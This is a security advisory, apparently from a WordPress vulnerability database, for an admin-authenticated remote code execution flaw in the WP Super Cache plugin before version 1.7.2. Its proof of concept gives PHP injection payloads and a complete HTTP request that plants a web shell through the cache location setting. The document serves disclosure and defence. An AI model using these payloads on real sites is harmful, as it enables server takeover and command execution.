WP Super Cache < 1.7.2 - Authenticated Remote Code Execution (RCE)
Description
The plugin was affected by an authenticated (admin+) RCE in the settings page due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection. Another possible attack vector: from XSS (via another plugin affected by XSS) to RCE.
Proof of Concept
Payloads: ';system($_GET[13]);include_once \'wp-cache-config.php\';' ';`$_GET[13]`;include_once \'wp-cache-config.php\';?><!-- ';`$_GET[13]`;# POST /wp-admin/options-general.php?page=wpsupercache&tab=settings HTTP/1.1 User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 501 Cookie: [admin cookies] _wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings&action=scupdates&wp_cache_enabled=1&wp_cache_mod_rewrite=0&wp_cache_not_logged_in=2&cache_rebuild_files=1&wp_cache_location=%2Fvar%2Fwww%2Fyour%2Fown%2Fpath%2Fexample.com%2Fwp-content%2Fcache%2F%27%3Bsystem%28%24_GET%5B13%5D%29%3Binclude_once+%5C%27wp-cache-config.php%5C%27%3B%27&_wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwpsupercache%26tab%3Dsettings
Affects Plugins
Fixed in version 1.7.2✓
Classification
Miscellaneous
Timeline
Publicly Published
2021-03-16 (about 4 months ago)
Added
2021-03-16 (about 4 months ago)
Last Updated
2021-05-14 (about 2 months ago)